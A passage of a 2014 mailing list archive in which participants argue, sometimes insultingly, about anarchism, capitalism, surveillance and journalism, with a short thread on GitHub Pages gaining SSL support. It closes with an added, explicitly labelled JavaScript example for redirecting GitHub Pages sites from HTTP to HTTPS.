look up direct democracy - there is often within our model questions regarding scalability that is often where the rubber meets the road for people - we dont know how that works exactly as it is not been sent into praxis enough but we have developed spokes councils and what happens is rotation of all aspects - all members are rotated so that it is not representative - now zizek has complained about our model that he doesnt want to participate in this kind of constant meetings he doesnt want to deal with other stuff besides his scholarly intellectual stuff ... i dont think it is a problem no one is forced to be a part - there is just no exclusion - inclusion is not mandated - so zizek is kinda not knowledgeable there - what i really like is that people that work in say sanitation do a report back about what is going on to everyone and people that work in say media can be knowledgeable about what is happening in that field (there can be people that actually work in both fields of course) but then the people in the field of media can be alerted if there is something they can do to help the field of sanitation in some way - get information out about that they need help with this project etc... information flow ....

anyway i dont want to write a book here maybe listen to this - yes theres a big star and david graeber capitalist but it has real info too

https://www.youtube.com/watch?v=bIv7MYS8JaE

particularly i would point you to the theories of proudhon, bakunin and kropotkin

> >> capitalism is an economic model that has severe ramifications
> >> for society it is no different than having a monarch really there
> >> is a degree of difference regarding poverty but ... i heard today
> >> that if you are dying of cancer in uganda you have a 10% chance
> >> of having access to morphine ... they give cancer patients
> >> paracetamol ... thats your great capitalism i find it disgusting
> >>
> Actually, that /isn't/ capitalism. Why do you think what you read is
> the case? Maybe it's because of deals cut between governments and
> corporations? Do you know what we call that intertwining? No, we don't
> call it capitalism. We call it /fascism/.
>

i call it capitalism when the assistant attorney general of the united states says they made a decision not to try to convict the banks of fraud because there would be an economic hit to the u$ of a ... that is capitalism in praxis today

i gotta go more later...

+++++++++++++++++++++++++++

> >> the careerist journalists laura poitras et al are capitalistic
> >> in every way - exploitive
> >
> > I disagree. The careerist journalists are "crony capitalists" in
> > every way.
> >
> >> listen i am an activist journalist making money / becoming famous
> >> like them off of journalism in the way they do it is not ok with
> >> me its not how i would ever in a million years do my work
>
> And /that/ is one of the great things about capitalism: you can try
> different things. You don't have to be confined to one narrow model.
> You don't agree with it? Great! Go do something your way and nobody is
> likely to stop you (except the predatory crony capitalists, but I
> think we've established those aren't real capitalists, right?)
>
> > They know that, regardless of the accuracy of their information,
> > the 'other side of the coin' will smooth things over and keep the
> > public hooked on an inferior product. That's not a true
> > capitalist.
> >
> >> i think you're an idealist actually 'true capitalism' thats a
> >> theory
>
> Perhaps I am. Just like a Utopian anarchistic society is a theory
> that's never been proven. It's a different way of thinking, each with
> positives and negatives. I think we're probably /both/ idealists in
> our own ways.
>
> > That's one of my main arguments with socialists and other
> > non-capitalist believers:
> >
> >> BELIEVERS????????? LMAO
> >
> >> i dont believe in belief that is religious
>
> You don't believe in the power of your anarchistic philosophy? Hmm,
> perhaps that's the problem then! I assume, being a journalist, you
> understand that words have multiple meanings and we use them within
> 'contexts'. Using the word 'believe' in the context I did doesn't have
> religious connotations at all. But I bet you know that. It looks like
> you are upset and just lashing out at everything because we don't
> agree. That's alright. I've seen your posts here and know you're more
> intelligent than that. So, yes, you're a 'believer' or...at
> least...you should be.
>
> > they point to our current system and say 'see, it's exploitive and
> > hurts people!' and it does. But that's not a true capitalist
> > system. Will we ever actually have one? Doubtful. But what we have
> > now is definitely not a good example.
> >
> >> i dont think you understand that capitalism is well beyond an
> >> economy - watch naomi klein
>
> Oh I understand it very well. I suspect it's you, who's obviously
> stuck within a very narrow worldview, who may not understand it. I've
> read Ms. Klein and I like a lot of her work - I don't agree with all
> of it, but I like it. But you know as well as I do that she comes at
> the topic with a bias. Also, from what I've read, her main beef seems
> to be with globalization and the influence corporations have on
> governments and, thus, the people. Remember, we've already covered
> this: it's not capitalism but /fascism/ when you have that.
>
> Do you have any thing in particular by Ms. Klein you'd like me to read
> that may help 'educate' me? I'd be happy to give it a go. So far, I've
> only read "No Logo", "The Take", and "The Shock Doctrine". Anything
> else I should pick up?
>
> >> https://www.youtube.com/watch?v=Ka3Pb_StJn4
>
> Yep, saw this video series. Brilliant woman, great book. Still talking
> largely about fascism and not capitalism. I mean, sure, she uses the
> /word/ 'capitalism' but that's not what she's describing. She's
> talking fascism.
>
> >> with capitalism the iraq invasion happened within its frame
> >
> >> black sites torture sites around the globe were conducted within
> >> the frame of capitalism > gitmo 'lives' inside the frame of
> >> capitalism
>
> So, do you believe that the horrible things that happened in Iraq and
> GITMO wouldn't have happened if the corporations weren't involved? I
> agree that they probably wouldn't have happened on such a /massive/
> scale simply because there would have been a manpower shortage but I
> suspect some of those 'true blue' soldiers wouldn't have had much of a
> problem picking up a chemical light and sticking it up someone's
> ass...or raping them. Were the naked pictures of prisoners at Abu
> Ghraib capitalism at work too? Oh, wait, those were soldiers, not
> businessmen trying to make money.
>
> >> i dont think you understand anarchy or anarchistic thought
> >> processes at all
>
> I certainly admit that I don't understand it as much as /you/ do or
> many others who spend a good amount of their time researching and
> reading anarchistic thought. But I do have a good understanding of it.
> However, feel free to point me in the direction of some good
> educational material. I'll read it happily! I like exploring different
> thoughts. I actually /like/ the idea of anarchy, just like I like much
> of the ideas of socialism. But they both, IMHO, fall a bit off the
> mark. That might be an educational thing that can be fixed though so
> feel free to point me in the right direction. No sarcasm intended
> here, I am open to learning!
>
> Cypher
>
> -----BEGIN PGP SIGNATURE-----
> Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
>
> iQIcBAEBCgAGBQJTPdEAAAoJEFuutbL6JoJrTmkP/2sH2LYqKN620/tkbZOT0fjD
> /JBsbumLknFOUL7ZpYcfa+Nh+2SOLTOFDX7GxuUckbHnkUtjAZgrXKcB+aoMYbMp
> NOZrufIp4lcOZo7a/5DWRlU4gYRH0FtYxkpDP06lLxWDHFQ0vCujflrifGiMidPU
> Ln4ATUy/wcT+OBDk+l3bWvoH3N9M2HQ9Ib/VaIcoyK6QOKLCKlMuKu+ft2PPK1nz
> n9NPFyEFFkLzs7uJZh+s0UYPHAJSJbB0pd/IBQ3NA3U8DfJBbQmH9SWOmNTFTBdo
> z8CFCem4smbUvyn208HQ1dyDArY400GnOx2Y20bADB+YO0g62CSmKEshPhPSRmDG
> bI4LnyUICrJ0rRKU/FzQLCTEtWNeRGAY8JhbMgQVShpqfcWl4TTL745b+FEk04QO
> Ikpnb2k+1zuGa+lDi4Xp9Lv0fxSW3W0j+w+t9o+u+0K/fOWkF7Gx/uB9G0/oynOb
> /sFMsvaUOcx7a879bHa88rr4mH5L5puCjTOeAUBkyC39jxcTRFvLEw4Sai1Q9mEY
> ZODFhA1BSgVJungKYLpqevIIyVlsKJW9LK8+ov8i2WDF2ygq1EqI+3iOwoKxFfmC
> EO9XdHUYtGtPsQKqh5ldl7rGQWYxu3J+FatmVhwGKCEdVer+yP/f5gT1h4SjrHVp
> x67TKKhVf3r2CYcZyZmw
> =gX6E
> -----END PGP SIGNATURE-----
>

--
Cari Machet
NYC 646-436-7795
carimachet at gmail.com
AIM carismachet
Syria +963-099 277 3243
Amman +962 077 636 9407
Berlin +49 152 11779219
Reykjavik +354 894 8650
Twitter: @carimachet

7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187

Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited.
Name: not available Type: text/html Size: 16962 bytes Desc: not available URL: From pc at loom.cc Fri Apr 4 07:19:19 2014 From: pc at loom.cc (Patrick Chkoreff) Date: Fri, 04 Apr 2014 10:19:19 -0400 Subject: Geoff Stone, Obama's Review Group In-Reply-To: References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> <533DCBB6.8080902@loom.cc> Message-ID: <533EBF67.6020708@loom.cc> Cari Machet wrote, On 04/04/2014 05:11 AM: > On Thu, Apr 3, 2014 at 8:59 PM, Patrick Chkoreff > wrote: > > Cari Machet wrote, On 04/03/2014 03:48 PM: > > > nobody 'owns' anything > > Ownership is an exclusive right of use or disposal. If I wake up one > morning and find you in my house eating my food, you-gonna be in big > trouble Lucy. > its a lie you tell yourself - you were told its true its not > > ever heard of eminent domain ? > > ever heard of israel? > > lets not even talk about your paycheck Now THAT is a good point. I thought you were deriding the very concept of ownership. If you're saying that private property is such a good idea that maybe we should *try* it sometime, then I'm with you. -- Patrick From pc at loom.cc Fri Apr 4 07:24:54 2014 From: pc at loom.cc (Patrick Chkoreff) Date: Fri, 04 Apr 2014 10:24:54 -0400 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <533DD10D.8090005@cpunk.us> References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> <533DBDDD.8050102@cpunk.us> <533DD10D.8090005@cpunk.us> Message-ID: <533EC0B6.6030500@loom.cc> Cypher wrote, On 04/03/2014 05:22 PM: > But, please, instead of ranting and wild arm-waving, educate me if > I am wrong. I would certainly /love/ to see a workable, large > scale, anarchistic plan. Please, no large scale plans, I beg you. I simply wish to see the emergent effects of countless individuals interacting with each other solely on the basis of mutual consent. That is all. 
-- Patrick From guido at witmond.nl Fri Apr 4 01:49:31 2014 From: guido at witmond.nl (Guido Witmond) Date: Fri, 04 Apr 2014 10:49:31 +0200 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <20140404042502.7DA6C2280B0@palinka.tinho.net> References: <20140404042502.7DA6C2280B0@palinka.tinho.net> Message-ID: <533E721B.5080708@witmond.nl> On 04/04/14 06:25, dan at geer.org wrote: > I fear we are on the edge of a rat-hole here. I forwarded Geoff's > remarks as they are relevant, timely, and speak to the absence of > simplistic nostrums in such matters, both because of the rising > popular / political demand for comfort-and-safety and because the > technologies that those charged with delivering comfort and safety > use are COTS technologies. And dual use. Personally, I think of > surveillance as just another tax, which you may safely assume is > said through clenched libertarian cum Tea Party teeth. Hi Dan, I like your idea of comparing being spied upon to paying tax. The similarities are striking: Like tax, I prefer to pay the least amount. Like tax, I can hire a professional that knows tax law inside out to find the (legal) loopholes. Like tax, it should be discussed in public. Like tax, society should strive to minimize the tax-burden. Like tax, we don't tax those to whom it doesn't apply. Regards, Guido. -------------- next part -------------- A non-text attachment was scrubbed... 
Name: signature.asc Type: application/pgp-signature Size: 897 bytes Desc: OpenPGP digital signature URL: From carimachet at gmail.com Fri Apr 4 04:03:42 2014 From: carimachet at gmail.com (Cari Machet) Date: Fri, 4 Apr 2014 11:03:42 +0000 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <9857014.dptqhKsx4l@lap> References: <20140403025616.D514A2280D8@palinka.tinho.net> <966007728.44996.1396564331597.JavaMail.www@wwinf8313> <9857014.dptqhKsx4l@lap> Message-ID: fuck off rysiek its a really long thing to explain to someone the future of fucking journalism if they are that far back i mean i could just say look at medium or look at certain journo's i guess like asher wolfe - money is not the object this person is a capitalist thinker and they dont understand the ethics of journo within the structure of how a journo works - nor do i think they care to really understand the point i was making i was making an argument not just calling them bad names my argument is they dont know enough - prove me wrong rysiek..... fucker hehe On Fri, Apr 4, 2014 at 10:44 AM, rysiek wrote: > On Friday, 4 April 2014 09:15:57 Cari Machet wrote: > > when people have no argument they resort to name calling and character > > assassination (...) > > ...and then... > > > you dont know anything about journalism past mayb the stone age > > http://i0.kym-cdn.com/photos/images/original/000/612/974/1de.php > > -- > Regards > rysiek -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. 
-------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2391 bytes Desc: not available URL: From yan at mit.edu Fri Apr 4 11:40:20 2014 From: yan at mit.edu (yan) Date: Fri, 04 Apr 2014 11:40:20 -0700 Subject: Github Pages now supports SSL In-Reply-To: References: Message-ID: <533EFC94.4060708@mit.edu> There's even an HTTPS Everywhere rule for it already in case you *only* want to ever access it over SSL! https://www.eff.org/https-everywhere (only in the development branch right now, should be released soon) On 04/04/2014 11:08 AM, Eric Mill wrote: > I know most of the people on here have transcended the earthbound, > maudlin Certificate Authority system, but as services-adopting-SSL-news > goes, I'm particularly excited about Github Pages, which started > quietly supporting SSL for *.github.io domains a few > weeks back. > > I'm excited because Github Pages is powerful, verrrrry flexible, and > totally free. AFAIK, it's the only major blog/web host that gives you > free SSL, backed by a high quality CDN (since everything is static files). > > To promote the occasion and nudge Github to take it further, I wrote up > my own experience, and a little how-to for forcing redirects via Jekyll: > > https://konklone.com/post/github-pages-now-supports-https-so-use-it > > Along with Cloudflare's 2014 plan to offer SSL termination for free, and > their stated plan to double SSL on the Internet by end of year, the > barrier to HTTPS everywhere is dropping rapidly. 
> > -- Eric > > -- > konklone.com | @konklone > From rysiek at hackerspace.pl Fri Apr 4 03:44:07 2014 From: rysiek at hackerspace.pl (rysiek) Date: Fri, 04 Apr 2014 12:44:07 +0200 Subject: Geoff Stone, Obama's Review Group In-Reply-To: References: <20140403025616.D514A2280D8@palinka.tinho.net> <966007728.44996.1396564331597.JavaMail.www@wwinf8313> Message-ID: <9857014.dptqhKsx4l@lap> On Friday, 4 April 2014 09:15:57 Cari Machet wrote: > when people have no argument they resort to name calling and character > assassination (...) ...and then... > you dont know anything about journalism past mayb the stone age http://i0.kym-cdn.com/photos/images/original/000/612/974/1de.php -- Regards rysiek -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part. URL: From pc at loom.cc Fri Apr 4 10:56:18 2014 From: pc at loom.cc (Patrick Chkoreff) Date: Fri, 04 Apr 2014 13:56:18 -0400 Subject: Geoff Stone, Obama's Review Group In-Reply-To: References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> <533DCBB6.8080902@loom.cc> <533EBF67.6020708@loom.cc> Message-ID: <533EF242.5010604@loom.cc> Cari wrote: > i dont agree that there is scarcity ... i think we have abundance and > the very idea of scarcity is a con game the elite and the autocrats > feed everyone fr before they are born so that they can exploit them You may not believe in scarcity, but I know one thing for a fact. I have a limited amount of food in my refrigerator, and a limited tolerance for strangers in my house. You may not call that "scarcity" but it sure sounds like scarcity to me. So I'll say it again: if I wake up one morning and find you in my house eating my food, you-gonna be in big trouble Lucy. 
-- Patrick From eric at konklone.com Fri Apr 4 11:08:46 2014 From: eric at konklone.com (Eric Mill) Date: Fri, 4 Apr 2014 14:08:46 -0400 Subject: Github Pages now supports SSL Message-ID: I know most of the people on here have transcended the earthbound, maudlin Certificate Authority system, but as services-adopting-SSL-news goes, I'm particularly excited about Github Pages, which started quietly supporting SSL for *.github.io domains a few weeks back. I'm excited because Github Pages is powerful, verrrrry flexible, and totally free. AFAIK, it's the only major blog/web host that gives you free SSL, backed by a high quality CDN (since everything is static files). To promote the occasion and nudge Github to take it further, I wrote up my own experience, and a little how-to for forcing redirects via Jekyll: https://konklone.com/post/github-pages-now-supports-https-so-use-it Along with Cloudflare's 2014 plan to offer SSL termination for free, and their stated plan to double SSL on the Internet by end of year, the barrier to HTTPS everywhere is dropping rapidly. -- Eric -- konklone.com | @konklone -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1466 bytes Desc: not available URL: From carimachet at gmail.com Fri Apr 4 08:20:19 2014 From: carimachet at gmail.com (Cari Machet) Date: Fri, 4 Apr 2014 15:20:19 +0000 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <533EBF67.6020708@loom.cc> References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> <533DCBB6.8080902@loom.cc> <533EBF67.6020708@loom.cc> Message-ID: On Fri, Apr 4, 2014 at 2:19 PM, Patrick Chkoreff wrote: > Cari Machet wrote, On 04/04/2014 05:11 AM: > > > On Thu, Apr 3, 2014 at 8:59 PM, Patrick Chkoreff > > wrote: > > > > Cari Machet wrote, On 04/03/2014 03:48 PM: > > > > > nobody 'owns' anything > > > > Ownership is an exclusive right of use or disposal. 
If I wake up one > > morning and find you in my house eating my food, you-gonna be in big > > trouble Lucy. > > > > its a lie you tell yourself - you were told its true its not > > > > ever heard of eminent domain ? > > > > ever heard of israel? > > > > lets not even talk about your paycheck > > > Now THAT is a good point. I thought you were deriding the very concept > of ownership. If you're saying that private property is such a good > idea that maybe we should *try* it sometime, then I'm with you. > > o your funny there is actually a lot in common that libertarians and anarchists have but it is bent differently - i dont agree that there is scarcity and live in intense fear that i wont get lotsa stuff - i think we have abundance and the very idea of scarcity is a con game the elite and the autocrats feed everyone fr before they are born so that they can exploit them i find the houses that look like restaurants or hotels that i have seen in the suburbs that outline washington dc are repulsive and i find it repulsive that there are people that have no potable water on the planet and cannot read or write - i would rather people and everything were treated and thought of as more equal > > -- Patrick > > -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... 
Name: not available Type: text/html Size: 3289 bytes Desc: not available URL: From cypher at cpunk.us Fri Apr 4 13:25:03 2014 From: cypher at cpunk.us (Cypher) Date: Fri, 04 Apr 2014 15:25:03 -0500 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <533EC0B6.6030500@loom.cc> References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> <533DBDDD.8050102@cpunk.us> <533DD10D.8090005@cpunk.us> <533EC0B6.6030500@loom.cc> Message-ID: <533F151F.6020801@cpunk.us> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 04/04/2014 09:24 AM, Patrick Chkoreff wrote: > Cypher wrote, On 04/03/2014 05:22 PM: > >> But, please, instead of ranting and wild arm-waving, educate me >> if I am wrong. I would certainly /love/ to see a workable, large >> scale, anarchistic plan. > > Please, no large scale plans, I beg you. I simply wish to see the > emergent effects of countless individuals interacting with each > other solely on the basis of mutual consent. That is all. Good response, Patrick. But how do you think we're going to get to that? Without concerted action, and it has to be more than everybody doing their own thing IMHO, how will that goal be achieved? I hear a lot of anarchists saying what you say and it's a fantastic goal. But how do we get there? - -- Want to communicate with me privately? 
Find my PGP public key here: http://pgp.mit.edu/pks/lookup?op=get&search=0x5BAEB5B2FA26826B Fingerprint: 6728 40CE 35EE 0BF3 2E15 C7CC 5BAE B5B2 FA26 826B -----BEGIN PGP SIGNATURE----- Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCgAGBQJTPxUfAAoJEFuutbL6JoJrRLoP/RiWKL2JaXTJiYwhWvjw6xM9 mzkm8SbQInZCEvqJ4FW82Zg//tOkrK9a/kvvRQCb2Y5MdxB5Ezkrt5qm2GwLzUJX xNl1+nl68J6BJzxjpqVmrf5zZfllLffLcU0084ajqGXY/rilzmCENB8F/epxmiR6 +cVdM9NXl953chNB9zz48ZpNKCe/mrz0CWPKUW4BEWzajp6r5iIcves3f78egLow nVWA+OQnQ0FBf78kMpn8MRnYf3EUA4KHXxzAo1DHbyWKGuykAcrzEnjCHE/7zOxi 21rhcUI7TT0S4G1hLmPDWIY3LgFFnV/CgRmsP3a1hF74i3vmccjYiRCDDINMxbet Rw3YRS94NhyfK3BJneAfOiGM55nnbki8MVlh42V/WWDYdBhWOqMvV3akTbnCkbaX 7fGy3ItnzyqUUjQa76Ywh+V0CZDlsMC/tnbFkAw44US7RGKCnzSe5OK47uXzsSwT 6KVEyEYPu8wHmrkB7u2zymKE5Ce/paizxDyMFEhbdwu0N47LbN728j7xgw8Zhbvj mIMnzHdRd8ZaGb9ccU8j1iGUUF1YMHCrrMB0ybtrzQHvyFSRT5ATeHpafX23w3bB xrgpbiO/ZL/52zwWzF2dbJMVzXdTbj3WRnMGMWKxKOmYQs9YJ7U8yLCCL/ETnAcL lToSMaLELVfi7QiyuIe8 =8+H4 -----END PGP SIGNATURE----- From carimachet at gmail.com Fri Apr 4 08:28:38 2014 From: carimachet at gmail.com (Cari Machet) Date: Fri, 4 Apr 2014 15:28:38 +0000 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <2061449686.115376.1396620102841.JavaMail.www@wwinf8223> References: <20140403025616.D514A2280D8@palinka.tinho.net> <966007728.44996.1396564331597.JavaMail.www@wwinf8313> <9857014.dptqhKsx4l@lap> <2061449686.115376.1396620102841.JavaMail.www@wwinf8223> Message-ID: On Fri, Apr 4, 2014 at 2:01 PM, wrote: > > Message du 04/04/14 13:36 > > De : "Cari Machet" > > fuck off rysiek its a really long thing to explain to someone the future > of > > fucking journalism > > Before the "future of journalism" there is the present and you are failing > hard at it. If your future of journalism implies your ignorant opinion, I > personally prefer another future, which can be shaped right now by keeping > your crazy mind away from anything important. 
> > > if they are that far back i mean i could just say look > > at medium or look at certain journo's i guess like asher wolfe - money is > > not the object this person is a capitalist thinker > > A bit of structured discourse or grammar studies would be a plus to your > chances of getting a job. > > > and they dont understand > > the ethics of journo within the structure of how a journo works > > Your "ethics" is merely your biased opinions, nothing more. Nobody needs > it, sorry. > > > - nor do i > > think they care to really understand the point i was making > > > > Crazy people are rather hard to understand. They make nonsensical phrases, > they throw childish fits, they invent ethics that only exist in their > minds, etc. > > > i was making an argument not just calling them bad names my argument is > > they dont know enough - prove me wrong rysiek..... fucker hehe > > > > Yes, you were just calling bad names and clearly your "know enough" equals > to "think crazy like me", which is a stupid argument not worth following. > Not everyone is bipolar and depressed in this world. > > You fail hard as an agent provocateur. > if i am such a goddamn incomprehensible nothing why do you bother to argue with me at all or why can you even comprehend enough of it to argue? ouroboros please do some research into new more democratic forms of journalism - journalistic co-ops etc -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. 
-------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 3538 bytes Desc: not available URL: From carimachet at gmail.com Fri Apr 4 08:29:46 2014 From: carimachet at gmail.com (Cari Machet) Date: Fri, 4 Apr 2014 15:29:46 +0000 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <533EC0B6.6030500@loom.cc> References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> <533DBDDD.8050102@cpunk.us> <533DD10D.8090005@cpunk.us> <533EC0B6.6030500@loom.cc> Message-ID: On Fri, Apr 4, 2014 at 2:24 PM, Patrick Chkoreff wrote: > Cypher wrote, On 04/03/2014 05:22 PM: > > > But, please, instead of ranting and wild arm-waving, educate me if > > I am wrong. I would certainly /love/ to see a workable, large > > scale, anarchistic plan. > > Please, no large scale plans, I beg you. I simply wish to see the > emergent effects of countless individuals interacting with each other > solely on the basis of mutual consent. That is all. > why? > > > -- Patrick > -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... 
Name: not available Type: text/html Size: 1908 bytes Desc: not available URL: From carimachet at gmail.com Fri Apr 4 08:33:42 2014 From: carimachet at gmail.com (Cari Machet) Date: Fri, 4 Apr 2014 15:33:42 +0000 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <20140404135311.316F7228143@palinka.tinho.net> References: <1396589288.30575.102621593.20AC353F@webmail.messagingengine.com> <20140404135311.316F7228143@palinka.tinho.net> Message-ID: On Fri, Apr 4, 2014 at 1:53 PM, wrote: > > shelley at misanthropia.info writes: > | On Thu, Apr 3, 2014, at 09:25 PM, Dan Geer wrote: > | > | >you can take my word, if you like > | > | No offense meant to you personally Dan, because I don't know you, but- I > | don't trust the word of anyone from In-Q-Tel in matters such as these. > | > > That is both perfectly fine and perfectly aligned with Geoff's remarks. > thats cute dan but no it is not aligned with what he said he did not say 'dont trust me' total bullshit > --dan > -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... 
Name: not available Type: text/html Size: 1993 bytes Desc: not available URL: From tpb-crypto at laposte.net Fri Apr 4 07:01:42 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Fri, 04 Apr 2014 16:01:42 +0200 Subject: Geoff Stone, Obama's Review Group In-Reply-To: References: <20140403025616.D514A2280D8@palinka.tinho.net> <966007728.44996.1396564331597.JavaMail.www@wwinf8313> <9857014.dptqhKsx4l@lap> Message-ID: <2061449686.115376.1396620102841.JavaMail.www@wwinf8223> > Message of 04/04/14 13:36 > From: "Cari Machet" > fuck off rysiek its a really long thing to explain to someone the future of > fucking journalism Before the "future of journalism" there is the present and you are failing hard at it. If your future of journalism implies your ignorant opinion, I personally prefer another future, which can be shaped right now by keeping your crazy mind away from anything important. > if they are that far back i mean i could just say look > at medium or look at certain journo's i guess like asher wolfe - money is > not the object this person is a capitalist thinker A bit of structured discourse or grammar studies would be a plus to your chances of getting a job. > and they dont understand > the ethics of journo within the structure of how a journo works Your "ethics" is merely your biased opinions, nothing more. Nobody needs it, sorry. > - nor do i > think they care to really understand the point i was making > Crazy people are rather hard to understand. They make nonsensical phrases, they throw childish fits, they invent ethics that only exist in their minds, etc. > i was making an argument not just calling them bad names my argument is > they dont know enough - prove me wrong rysiek..... fucker hehe > Yes, you were just calling bad names and clearly your "know enough" equals to "think crazy like me", which is a stupid argument not worth following. Not everyone is bipolar and depressed in this world. You fail hard as an agent provocateur. 
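Back on the "Github Pages now supports SSL" thread above (Eric Mill's post and yan's reply about an HTTPS Everywhere rule): a static host serves files as-is, so the "forcing redirects via Jekyll" Eric mentions cannot be a server-side 301 and has to run in the page itself. The block below is an added example, not code from Eric's post, from GitHub, or from the HTTPS Everywhere ruleset. It assumes, as the thread states, that SSL is offered on *.github.io hosts only (so custom domains must not be redirected), models the wildcard target as matching a single label, and uses made-up hostnames and paths; the Jekyll layout path it names is hypothetical.

```javascript
// Added example (not from Eric Mill's post, GitHub, or HTTPS Everywhere).
// Client-side HTTP -> HTTPS upgrade for a static site on GitHub Pages.
// A static host serves files as-is: no server-side 301 and no way to emit an
// HSTS header, so the upgrade has to happen in the page. Assumption (from the
// thread): SSL is offered on *.github.io only, so custom domains are left alone.

const SSL_SUFFIX = '.github.io';

// Decide where an insecure page load should go. `loc` has the shape of
// window.location (protocol, hostname, pathname, search, hash).
// Returns the HTTPS URL string, or null when no redirect should happen.
function httpsUpgradeTarget(loc) {
  if (loc.protocol !== 'http:') return null;        // already https, or file:/about: etc.
  const host = String(loc.hostname || '').toLowerCase();
  if (!host.endsWith(SSL_SUFFIX)) return null;      // custom domain: no SSL there (2014)
  // Carry path, query and fragment across so deep links and anchors survive.
  return 'https://' + host + (loc.pathname || '/') + (loc.search || '') + (loc.hash || '');
}

// Model of what the HTTPS Everywhere rule yan mentions does for these hosts:
// a target-host match (the "*." wildcard modelled as one label, an assumption)
// plus a from/to rewrite applied to the URL. Hosts not covered pass through.
const githubPagesRuleset = {
  targets: [/^[^./]+\.github\.io$/i],        // <target host="*.github.io" />
  rules: [{ from: /^http:/, to: 'https:' }], // <rule from="^http:" to="https:" />
};

function applyRuleset(url, ruleset) {
  const host = new URL(url).hostname;
  if (!ruleset.targets.some((t) => t.test(host))) return url; // not covered: unchanged
  for (const r of ruleset.rules) {
    if (r.from.test(url)) return url.replace(r.from, r.to);
  }
  return url;
}

// Inline snippet to paste into a Jekyll layout (e.g. _layouts/default.html, a
// hypothetical path) so every generated page performs the upgrade on load.
function jekyllRedirectSnippet() {
  return [
    '<script>',
    '(function () {',
    "  if (location.protocol === 'http:' && /\\.github\\.io$/i.test(location.hostname)) {",
    "    location.replace('https://' + location.hostname + location.pathname + location.search + location.hash);",
    '  }',
    '})();',
    '</script>',
  ].join('\n');
}

// In a browser, act on the current page; under Node there is no window, so skip.
if (typeof window !== 'undefined' && window.location) {
  const target = httpsUpgradeTarget(window.location);
  if (target) window.location.replace(target);
}
```

The caveat a practitioner wants: a redirect that runs in page script only fires after the insecure response has already been delivered, so an on-path attacker who serves their own plain-HTTP page simply never runs it. It nudges users, links and crawlers toward the HTTPS URL; it is not a substitute for an HSTS header, which a static file host that gives you no control over response headers cannot emit for you. The `.github.io` suffix check also deliberately includes the leading dot, so a look-alike such as `evilgithub.io` is not treated as eligible.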
